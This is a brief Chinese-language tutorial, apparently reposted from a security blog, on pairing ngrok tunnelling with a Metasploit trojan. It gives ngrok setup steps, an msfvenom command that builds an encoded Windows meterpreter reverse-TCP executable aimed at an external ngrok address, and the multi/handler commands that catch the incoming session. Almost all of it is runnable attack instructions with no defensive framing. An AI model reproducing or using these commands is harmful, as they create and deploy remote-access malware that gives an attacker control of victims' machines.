Ngrok内网穿透配合msf木马
1. Ngrok的安装
原文地址:http://www.ggsec.cn/
Ngrok的下载地址:https://ngrok.com/download
下载对应版本并注册帐号
解压后将其放入 /bin/
ngrok authtoken 6RBm_2CfWq3xAJ3XVK(6RBm_2CfWq3xAJ3XVK是你注册后给你的)
2.tcp内网穿透
Ngrok tcp 2222
3.配置msf马
Ping一下Forwarding的域名,复制ip
生成msf木马
msfvenom -p windows/meterpreter/reverse_tcp-e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=52.15.62.13 LPORT=12545 -f exe >sky.exe
(LHOST填写ping得到的ip;LPORT填写ngrok Forwarding那一行的端口)
4.开启监听
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 127.0.0.1
msf exploit(handler) > set LPORT 2222
msf exploit(handler) > exploit
(等目标上线会自动弹出meterpreter)